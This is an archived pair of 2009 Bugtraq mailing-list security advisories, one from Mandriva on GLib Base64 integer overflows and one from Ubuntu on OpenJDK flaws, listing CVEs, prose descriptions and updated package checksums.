-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla -
http://enigmail.mozdev.org
iD8DBQFJy9u0bjs6HoxIfBkRAvbcAKCuSvTy+HKzbK2dUgL5I43u5QjV9ACeMJHP
1Lsily+yi/50OxP7rm1360k=gsbK
-----END PGP SIGNATURE-----
From - Fri Mar 27 14:52:50 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006d3d
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39852-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 567C3EC111
for <lists@securityspace.com>; Fri, 27 Mar 2009 14:43:58 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id DE2032379BD; Fri, 27 Mar 2009 10:53:38 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 6602 invoked from network); 26 Mar 2009 21:47:29 -0000
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:080 ] glib2.0
Date: Thu, 26 Mar 2009 22:50:00 +0100
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LmxSa-0005ls-SZ@titan.mandriva.com>
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2009:080
http://www.mandriva.com/security/
_______________________________________________________________________
Package : glib2.0
Date : March 26, 2009
Affected: 2008.0, 2008.1, 2009.0
_______________________________________________________________________
Problem Description:
Multiple integer overflows in GLib's Base64 encoding and decoding
functions enable attackers (possibly remote ones, depending on
the applications glib2 is linked against with - mostly GNOME ones)
either to cause denial of service and to execute arbitrary code via
an untrusted input (CVE-2008-4316).
This update provide the fix for that security issue.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4316
_______________________________________________________________________
Updated Packages:
Mandriva Linux 2008.0:
ec6549c72d1fb6125ab8d398586ea4fb 2008.0/i586/glib2.0-common-2.14.1-2.1mdv2008.0.i586.rpm
af169954484c24fb30888317ae22b408 2008.0/i586/glib-gettextize-2.14.1-2.1mdv2008.0.i586.rpm
f933fbb158f4a94311ea0adb0267abfd 2008.0/i586/libglib2.0_0-2.14.1-2.1mdv2008.0.i586.rpm
36f304c0aec1f7989146364acaf8c0b2 2008.0/i586/libglib2.0_0-devel-2.14.1-2.1mdv2008.0.i586.rpm
1786bde9976bce5014db73d0801b38ac 2008.0/SRPMS/glib2.0-2.14.1-2.1mdv2008.0.src.rpm
Mandriva Linux 2008.0/X86_64:
9cf29b7dbebf5048084b6b1f35e0f4cb 2008.0/x86_64/glib2.0-common-2.14.1-2.1mdv2008.0.x86_64.rpm
270bcf8ba069c5ac6b6e6cf89987b807 2008.0/x86_64/glib-gettextize-2.14.1-2.1mdv2008.0.x86_64.rpm
31031ac78ab9d873a29fa369ff30e610 2008.0/x86_64/lib64glib2.0_0-2.14.1-2.1mdv2008.0.x86_64.rpm
9c1d61a59e7c60092e1c0e3908bb6a65 2008.0/x86_64/lib64glib2.0_0-devel-2.14.1-2.1mdv2008.0.x86_64.rpm
1786bde9976bce5014db73d0801b38ac 2008.0/SRPMS/glib2.0-2.14.1-2.1mdv2008.0.src.rpm
Mandriva Linux 2008.1:
1baba5d7eb9f0c432bf73fd88b4ed7b2 2008.1/i586/glib2.0-common-2.16.2-1.1mdv2008.1.i586.rpm
25195a507ab1cb4c83821ec13b73c2de 2008.1/i586/glib-gettextize-2.16.2-1.1mdv2008.1.i586.rpm
0842c6fcbc536211ccf2a0a4d87e3546 2008.1/i586/libgio2.0_0-2.16.2-1.1mdv2008.1.i586.rpm
0e8cf91144c192f2bb5f35baf83f962c 2008.1/i586/libglib2.0_0-2.16.2-1.1mdv2008.1.i586.rpm
6323a69186cb517ae2863d7a76781048 2008.1/i586/libglib2.0-devel-2.16.2-1.1mdv2008.1.i586.rpm
7ae19c9ab3b92c24968805d227a59016 2008.1/SRPMS/glib2.0-2.16.2-1.1mdv2008.1.src.rpm
Mandriva Linux 2008.1/X86_64:
1589cb70c3243cef09da4d50c15b09b1 2008.1/x86_64/glib2.0-common-2.16.2-1.1mdv2008.1.x86_64.rpm
6c2579e55949fbe1835adf31ea5131bd 2008.1/x86_64/glib-gettextize-2.16.2-1.1mdv2008.1.x86_64.rpm
194712afcd7513be076a6759525f12f9 2008.1/x86_64/lib64gio2.0_0-2.16.2-1.1mdv2008.1.x86_64.rpm
3da1dd0e0141705c2c0e31499dd75608 2008.1/x86_64/lib64glib2.0_0-2.16.2-1.1mdv2008.1.x86_64.rpm
36eed7d79a1e42f832db1e45fba41e7c 2008.1/x86_64/lib64glib2.0-devel-2.16.2-1.1mdv2008.1.x86_64.rpm
7ae19c9ab3b92c24968805d227a59016 2008.1/SRPMS/glib2.0-2.16.2-1.1mdv2008.1.src.rpm
Mandriva Linux 2009.0:
690e5195cc87714bdc3cc0fbd5d1e443 2009.0/i586/glib2.0-common-2.18.1-1.1mdv2009.0.i586.rpm
d9ca28417fae46f7fb2623a12d43ae0a 2009.0/i586/glib-gettextize-2.18.1-1.1mdv2009.0.i586.rpm
515b3c6e02aaa3d2323b2205b77e4f60 2009.0/i586/libgio2.0_0-2.18.1-1.1mdv2009.0.i586.rpm
05ef65b0189ed3df27459b0357e84156 2009.0/i586/libglib2.0_0-2.18.1-1.1mdv2009.0.i586.rpm
7433775a074a0631631f9a36c38cb603 2009.0/i586/libglib2.0-devel-2.18.1-1.1mdv2009.0.i586.rpm
dc74fa4eccc0e8a4fe016d6e48efd7c2 2009.0/SRPMS/glib2.0-2.18.1-1.1mdv2009.0.src.rpm
Mandriva Linux 2009.0/X86_64:
a354c7986fc2d17ea31679d5c9c3c32c 2009.0/x86_64/glib2.0-common-2.18.1-1.1mdv2009.0.x86_64.rpm
c696c96b510cc0d983c3f4449208109d 2009.0/x86_64/glib-gettextize-2.18.1-1.1mdv2009.0.x86_64.rpm
fc5eb4080df3b6670b53952c82f0df47 2009.0/x86_64/lib64gio2.0_0-2.18.1-1.1mdv2009.0.x86_64.rpm
29fc292f7f40bcf4a64b889694141d5e 2009.0/x86_64/lib64glib2.0_0-2.18.1-1.1mdv2009.0.x86_64.rpm
479553db25caae6550ab085986b88801 2009.0/x86_64/lib64glib2.0-devel-2.18.1-1.1mdv2009.0.x86_64.rpm
dc74fa4eccc0e8a4fe016d6e48efd7c2 2009.0/SRPMS/glib2.0-2.18.1-1.1mdv2009.0.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFJy8u1mqjQ0CJFipgRAlGJAJ9VHB8hVdCEydzypTyey6I5XUmnpgCgpMFM
2+7+r/yYeuRKOgQrCp56MgM=GpP3
-----END PGP SIGNATURE-----
From - Fri Mar 27 15:02:50 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006d3e
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39853-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 6FA90EC10D
for <lists@securityspace.com>; Fri, 27 Mar 2009 14:54:56 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id D2F6A2379BE; Fri, 27 Mar 2009 10:53:48 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 6737 invoked from network); 26 Mar 2009 21:59:29 -0000
Date: Thu, 26 Mar 2009 15:01:35 -0700
From: Kees Cook <kees@ubuntu.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: [USN-748-1] OpenJDK vulnerabilities
Message-ID: <20090326220135.GF17595@outflux.net>
Reply-To: Ubuntu Security <security@ubuntu.com>
MIME-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="FkmkrVfFsRoUs1wW"
Content-Disposition: inline
Organization: Ubuntu
X-MIMEDefang-Filter: outflux$Revision: 1.316 $
X-HELO: www.outflux.net
X-Scanned-By: MIMEDefang 2.64 on 10.2.0.1
Status:
--FkmkrVfFsRoUs1wW
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
==========================================================Ubuntu Security Notice USN-748-1 March 26, 2009
openjdk-6 vulnerabilities
CVE-2006-2426, CVE-2009-1093, CVE-2009-1094, CVE-2009-1095,
CVE-2009-1096, CVE-2009-1097, CVE-2009-1098, CVE-2009-1100,
CVE-2009-1101, CVE-2009-1102
==========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 8.10
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 8.10:
icedtea6-plugin 6b12-0ubuntu6.4
openjdk-6-jdk 6b12-0ubuntu6.4
openjdk-6-jre 6b12-0ubuntu6.4
openjdk-6-jre-headless 6b12-0ubuntu6.4
openjdk-6-jre-lib 6b12-0ubuntu6.4
After a standard system upgrade you need to restart any Java applications
to effect the necessary changes.
Details follow:
It was discovered that font creation could leak temporary files.
If a user were tricked into loading a malicious program or applet,
a remote attacker could consume disk space, leading to a denial of
service. (CVE-2006-2426, CVE-2009-1100)
It was discovered that the lightweight HttpServer did not correctly close
files on dataless connections. A remote attacker could send specially
crafted requests, leading to a denial of service. (CVE-2009-1101)
Certain 64bit Java actions would crash an application. A local attacker
might be able to cause a denial of service. (CVE-2009-1102)
It was discovered that LDAP connections did not close correctly.
A remote attacker could send specially crafted requests, leading to a
denial of service. (CVE-2009-1093)
Java LDAP routines did not unserialize certain data correctly. A remote
attacker could send specially crafted requests that could lead to
arbitrary code execution. (CVE-2009-1094)
Java did not correctly check certain JAR headers. If a user or
automated system were tricked into processing a malicious JAR file,
a remote attacker could crash the application, leading to a denial of
service. (CVE-2009-1095, CVE-2009-1096)
It was discovered that PNG and GIF decoding in Java could lead to memory
corruption. If a user or automated system were tricked into processing
a specially crafted image, a remote attacker could crash the application,
leading to a denial of service. (CVE-2009-1097, CVE-2009-1098)
Updated packages for Ubuntu 8.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b12-0ubuntu6.4.diff.gz
Size/MD5: 257215 876f885acf37c0817a35956e6520de3a
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b12-0ubuntu6.4.dsc
Size/MD5: 2355 d8a4b0fe60497fd1f61c978c3c78e571
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b12.orig.tar.gz
Size/MD5: 54363262 f3aa01206f2192464b998fb7cc550686
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-doc_6b12-0ubuntu6.4_all.deb
Size/MD5: 8469732 b032a764ce88bd155f9aaba02ecc6566
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-lib_6b12-0ubuntu6.4_all.deb
Size/MD5: 4709872 299164cb69aa3ec883867afb7d8d9054
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-source_6b12-0ubuntu6.4_all.deb
Size/MD5: 25627544 e62afaf0e692fa587de0056cf014175d
http://security.ubuntu.com/ubuntu/pool/universe/o/openjdk-6/openjdk-6-source-files_6b12-0ubuntu6.4_all.deb
Size/MD5: 49156004 2de3d037ef595b34ccb98324b11f1159
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.4_amd64.deb
Size/MD5: 81028 8952bc76c555dc8d950b2d3bfa940b7c
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.4_amd64.deb
Size/MD5: 47372520 d70f9ed68d2837e2f3f107a607b5cc96
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.4_amd64.deb
Size/MD5: 2366132 75294026f904346ec76397cd388252c3
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.4_amd64.deb
Size/MD5: 9944822 cfd88c5f3fe97c67d8eca19908344823
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.4_amd64.deb
Size/MD5: 24099904 24468c4793c974819f83b06fb41adc90
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.4_amd64.deb
Size/MD5: 241642 240d8346bb895f9623091c94c81ae466
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.4_i386.deb
Size/MD5: 71516 5c67a03b0011a3bd117fae210ca27cd9
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.4_i386.deb
Size/MD5: 101847192 302ab3721553014290ce4bfdee6cb6fb
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.4_i386.deb
Size/MD5: 2348630 1a4c103e4d235f7d641f2e0f2ddfe4c3
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.4_i386.deb
Size/MD5: 9952338 c6bc056c5fa988f8841542a6801aa84d
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.4_i386.deb
Size/MD5: 25177778 41fa22a436950239955756efe7bc9112
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.4_i386.deb
Size/MD5: 230774 5c5188e21a7a5a76763d7f651162dc3a
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.4_lpia.deb
Size/MD5: 72110 1b419781fc73fe42b85ff180f520edc2
http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.4_lpia.deb
Size/MD5: 101930130 abc646dc9df27f3415ff07dcb0c38e51
http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.4_lpia.deb
Size/MD5: 2345400 ef0b99c18c2ce4cd1ae68f1f20d08566
http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.4_lpia.deb
Size/MD5: 9947530 6bb618600d7c1f7ec68a68519094e0d9
http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.4_lpia.deb
Size/MD5: 25207906 1b334898157a834ab05ee74593ce57e4
http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.4_lpia.deb
Size/MD5: 227556 ad49784b480e88550c61dfc069cb4d2a
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.4_powerpc.deb
Size/MD5: 77056 11313904c64bee4204f6369b4ffd5e66
http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.4_powerpc.deb
Size/MD5: 35898024 50945e6c1cbed766ea52b78fb7ed2ac5
http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.4_powerpc.deb
Size/MD5: 2393022 c04df84eeb2373a7f0cd84ad85610188
http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.4_powerpc.deb
Size/MD5: 8600518 197d84aae1eaafdab671a5749b42b86c
http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.4_powerpc.deb
Size/MD5: 22988430 27721c39140811fd6ef9b00124c10b70
http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.4_powerpc.deb
Size/MD5: 255542 a7d6deeb5ef7143bb8631c593f4c36c6
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.4_sparc.deb
Size/MD5: 70098 44eca12cf6d8ed10e02a755772052b5b
http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.4_sparc.deb
Size/MD5: 103688730 0034a5b63b78e38f3c5bb0d0b920b9cf
http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.4_sparc.deb
Size/MD5: 2355160 e8adc4df2d4bc39f66da967b5272d455
http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.4_sparc.deb
Size/MD5: 9940784 c35a4115f4587df050af4c16de829674
http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.4_sparc.deb
Size/MD5: 25193444 0e4de129d523ef09bed9e3a22c6cecf3
http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.4_sparc.deb
Size/MD5: 233052 1773a666f39a632f458e850fb300ef12
